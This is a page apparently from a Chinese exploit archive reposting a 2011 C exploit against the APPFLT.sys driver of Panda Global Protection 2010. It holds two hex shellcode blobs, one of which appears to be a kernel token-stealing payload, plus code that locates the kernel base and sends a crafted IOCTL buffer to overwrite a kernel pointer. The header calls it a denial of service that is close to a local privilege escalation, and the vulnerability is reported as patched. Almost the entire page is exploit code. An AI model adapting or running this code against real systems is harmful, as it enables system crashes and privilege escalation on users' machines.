首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Panda Global Protection 2010 local Dos (unfiltered wcscpy())
来源:s.leberre@sysdream.com 作者:Heurs 发布时间:2011-01-24  

#include <windows.h>
#include <string.h>
#include <ddk/ntapi.h>
#include <tlhelp32.h>

#define SystemModuleInfo 11

/*
Program          : Panda Global Protection 2010 (3.01.00)
Homepage         : http://www.pandasecurity.com
Discovery        : 2010/04/09
Author Contacted : 2010/07/15
Status of vuln   : Patched !
Found by         : Heurs
This Advisory    : Heurs
Contact          : s.leberre@sysdream.com


//----- Application description


Antivirus Global Protection 2010 is the most complete product, with everything
you need to protect your computer and information. It protects you from viruses,
spyware, rootkits, hackers, online fraud, identity theft and all other Internet
threats. The anti-spam engine will keep your inbox free from junk mail while the
Parental Control feature will keep your family safe when using the Internet. You
can also back up important files (documents, music, photos, etc.) to a CD/DVD or
online (5GB free space available) and restore them in case of accidental loss or
damage. And thanks to the most innovative and new detection technologies and improved
Collective Intelligence, the solution is now much faster than previous versions.

//----- Description of vulnerability

APPFLT.sys driver don't check inputs integers of an IOCTL. An exception can be
thrown if we modify one DWORD.
Exploit isn't functional but with few work it can be a local privilege escalation.

//----- Credits

http://www.sysdream.com
http://www.hackinparis.com/
http://ghostsinthestack.org

s.leberre at sysdream dot com
heurs at ghostsinthestack dot org

//----- Greetings

Mysterie

*/


char ShellcodeMaster[] =
"\x33\xf6\x33\xff\x64\xa1\x24\x01\x00\x00\x8b\x40\x44\x05\x88\x00"
"\x00\x00\x8b\xd0\x8b\x58\xfc\x81\xfb\x41\x41\x41\x41\x75\x02\x8b"
"\xf0\x83\xfb\x04\x75\x02\x8b\xf8\x8b\xd6\x23\xd7\x85\xd2\x75\x08"
"\x8b\x00\x3b\xc2\x75\xde\xeb\x10\x8b\xc7\xb9\x40\x00\x00\x00\x03"
"\xc1\x8b\x00\x8b\xde\x89\x04\x19\xba\x11\x11\x11\x11\xb9\x22\x22"
"\x22\x22\xb8\x3b\x00\x00\x00\x8e\xe0\x0f\x35";

char RealShellcode[] =
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x15"
"\xf3\x1d\xb8\x83\xeb\xfc\xe2\xf4\xe9\x1b\x59\xb8\x15\xf3\x96\xfd"
"\x29\x78\x61\xbd\x6d\xf2\xf2\x33\x5a\xeb\x96\xe7\x35\xf2\xf6\xf1"
"\x9e\xc7\x96\xb9\xfb\xc2\xdd\x21\xb9\x77\xdd\xcc\x12\x32\xd7\xb5"
"\x14\x31\xf6\x4c\x2e\xa7\x39\xbc\x60\x16\x96\xe7\x31\xf2\xf6\xde"
"\x9e\xff\x56\x33\x4a\xef\x1c\x53\x9e\xef\x96\xb9\xfe\x7a\x41\x9c"
"\x11\x30\x2c\x78\x71\x78\x5d\x88\x90\x33\x65\xb4\x9e\xb3\x11\x33"
"\x65\xef\xb0\x33\x7d\xfb\xf6\xb1\x9e\x73\xad\xb8\x15\xf3\x96\xd0"
"\x29\xac\x2c\x4e\x75\xa5\x94\x40\x96\x33\x66\xe8\x7d\x8d\xc5\x5a"
"\x66\x9b\x85\x46\x9f\xfd\x4a\x47\xf2\x90\x70\xdc\x3b\x96\x65\xdd"
"\x15\xf3\x1d\xb8";

typedef struct _SYSTEM_MODULE_ENTRY
{
    ULONG  Unused;
    ULONG  Always0;
    PVOID  ModuleBaseAddress;
    ULONG  ModuleSize;
    ULONG  Unknown;
    ULONG  ModuleEntryIndex;
    USHORT ModuleNameLength;
    USHORT ModuleNameOffset;
    CHAR   ModuleName [256];
} SYSTEM_MODULE_ENTRY, * PSYSTEM_MODULE_ENTRY;


DWORD GetDataSection(HANDLE ImageBase){
    IMAGE_DOS_HEADER * mDosHeader;
    IMAGE_NT_HEADERS * mNtHeader;
    IMAGE_SECTION_HEADER * mSecHeader;
    int i;
   
    mDosHeader = (PIMAGE_DOS_HEADER) ImageBase;
    if (mDosHeader->e_magic != 0x5A4D) {
        return 0;
    }
   
    mNtHeader = (PIMAGE_NT_HEADERS) (mDosHeader->e_lfanew + ImageBase);
    if (mNtHeader->Signature != 0x00004550) {
        return 0;
    }
   
    mSecHeader = (PIMAGE_SECTION_HEADER) (mDosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS) + ImageBase);
    for (i=0; i<mNtHeader->FileHeader.NumberOfSections; i++){
        if (!strcmp(mSecHeader->Name, ".data"))
            return mSecHeader->VirtualAddress;
        mSecHeader++;
    }
   
    return 0;
}

PVOID KernelGetModuleBase(PCHAR  pModuleName)
{
    PVOID pModuleBase = NULL;
    PULONG pSystemInfoBuffer = NULL;
   
    NTSTATUS status = STATUS_INSUFFICIENT_RESOURCES;
    ULONG    SystemInfoBufferSize = 0;
   
    status = ZwQuerySystemInformation(SystemModuleInfo,
        &SystemInfoBufferSize,
        0,
        &SystemInfoBufferSize);
   
    if (!SystemInfoBufferSize){
        return NULL;
    }
   
    pSystemInfoBuffer = (PULONG)malloc(SystemInfoBufferSize*2);
   
    if (!pSystemInfoBuffer){
        return NULL;
    }
   
    memset(pSystemInfoBuffer, 0, SystemInfoBufferSize*2);
   
    status = ZwQuerySystemInformation(SystemModuleInfo,
    pSystemInfoBuffer,
    SystemInfoBufferSize*2,
    &SystemInfoBufferSize);
   
   
    if (NT_SUCCESS(status))
    {
        PSYSTEM_MODULE_ENTRY pSysModuleEntry =
        (PSYSTEM_MODULE_ENTRY)((PSYSTEM_MODULE_INFORMATION)(pSystemInfoBuffer))->Module;
        ULONG i;
       
        for (i = 0; i <((PSYSTEM_MODULE_INFORMATION)(pSystemInfoBuffer))->Count; i++)
        {
            if (_stricmp(pSysModuleEntry[i].ModuleName +
                pSysModuleEntry[i].ModuleNameOffset, pModuleName) == 0)
            {
                pModuleBase = pSysModuleEntry[i].ModuleBaseAddress;
                break;
            }
        }
    }
   
    if(pSystemInfoBuffer) {
        free(pSystemInfoBuffer);
    }
   
    return pModuleBase;
} // end KernelGetModuleBase()

int __cdecl main(int argc, char* argv[])
{
    HANDLE hDevice = (HANDLE) 0xffffffff;
    DWORD NombreByte;
    DWORD Crashing[] = {
0xaaaaaaaa, 0xbbbbbbbb, 0xcccccccc, 0xdddddddd,
0xeeeeeeee, 0x11111111, 0x001cfdea, 0x002dc6c0,
0x000000a8, 0x0044005c, 0x00760065, 0x00630069,
0x005c0065, 0x00610048, 0x00640072, 0x00690064,
0x006b0073, 0x006f0056, 0x0075006c, 0x0065006d,
0x005c0031, 0x00720050, 0x0067006f, 0x00610072,
0x0020006d, 0x00690046, 0x0065006c, 0x005c0073,
0x00610050, 0x0064006e, 0x00200061, 0x00650053,
0x00750063, 0x00690072, 0x00790074, 0x0050005c,
0x006e0061, 0x00610064, 0x00470020, 0x006f006c,
0x00610062, 0x0020006c, 0x00720050, 0x0074006f,
0x00630065, 0x00690074, 0x006e006f, 0x00320020,
0x00310030, 0x005c0030, 0x00650057, 0x00500062,
0x006f0072, 0x00790078, 0x0065002e, 0x00650078,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420
        };
    char out[sizeof(Crashing)];
    DWORD ShellcodeToExecute;
    DWORD KernelImageBase;
    DWORD KernelPointerDeref;
    DWORD VirtImageBaseKnl;
    DWORD NullAddress;
    KEVENT NewKevent;
    int i = 0x1000;
   
    printf("Local Privilege Escalation - Panda Global Protection 2010 (3.01.00)\n\n");
    hDevice = CreateFile("\\\\.\\AppFlt",GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,0,NULL);
   
    ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x00110000, 0x10000, MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x00110000, 0x10000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

   
    ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x19653420, 0x1000, MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x19653420, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
   
    memcpy((void*)0x19653420, ShellcodeMaster, sizeof(ShellcodeMaster));
    
    KernelImageBase = (DWORD) KernelGetModuleBase("ntoskrnl.exe");
   
    if (!KernelImageBase){
       KernelImageBase = (DWORD) KernelGetModuleBase("ntkrnlpa.exe");
       VirtImageBaseKnl = (DWORD) LoadLibrary("ntkrnlpa.exe");
       KernelPointerDeref = KernelImageBase + GetDataSection((HANDLE)VirtImageBaseKnl) + 0x3C;
    } else {
       VirtImageBaseKnl = (DWORD) LoadLibrary("ntoskrnl.exe");
       KernelPointerDeref = KernelImageBase + 0x3C;
    }
   
    Crashing[469] = (KernelPointerDeref - 0x750) ^ 0x19653420;
   
    memcpy((PVOID)0x001129f9, &Crashing[60], 4);
    memcpy((PVOID)0x001129f9 + 0x4, &Crashing[60], 4);
    memcpy((PVOID)0x001129f9 + 0x8, &Crashing[60], 4);
    memcpy((PVOID)0x001129f9 + 0xC, &Crashing[60], 4);
    memcpy((PVOID)0x001129f9 + 0x10, &Crashing[60], 4);
    memcpy((PVOID)0x001129f9 + 0x16, &Crashing[60], 4);
   
    DeviceIoControl(hDevice,0x06660E1C,Crashing,sizeof(Crashing),out,sizeof(Crashing),&NombreByte,NULL);
   
    printf("Sploit Send.\nhDevice = %x\n", hDevice);
    CloseHandle(hDevice);
    getch();
    return 0;
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Panda Global Protection 2010 l
·BSD x86 connect back Shellcode
·Look n stop 0day Local Dos
·BSD x86 portbind + fork shellc
·ALZip 8.12.0.3 Buffer Overflow
·Inetserv 3.23 SMTP Denial of S
·Novell iPrint <= 5.52 ActiveX
·Golden FTP Server v4.70 PASS C
·Google Chrome v8.0.552.237 add
·Inetserv 3.23 POP3 Denial of S
·CakePHP <= 1.3.5 / 1.2.8 unser
·A-PDF All to MP3 Converter 2.0
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved